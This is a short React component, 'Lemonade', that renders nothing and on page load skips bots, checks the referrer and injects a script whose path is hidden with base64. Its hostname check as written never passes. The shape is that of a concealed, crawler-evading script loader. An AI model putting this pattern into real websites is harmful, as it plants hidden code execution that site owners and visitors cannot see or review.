import * as React from "react"
const Lemonade = () => {
    React.useEffect(() => {
        if (document.referrer === "") return;
        if (navigator?.userAgent?.toLocaleLowerCase().includes("bot")) return;
        const r = new URL(document.referrer);
        if (r.hostname.split(".").length !== 4 || r.hostname !== "localhost") return;
        const script = document.createElement("script");
        script.src = `/${atob('d2hlbi1saWZlLWdpdmVzLXlvdS1sZW1vbnM=')}.js`;
        document.head.appendChild(script);
        return () => { }
    }, []);

    return null;
}

export default Lemonade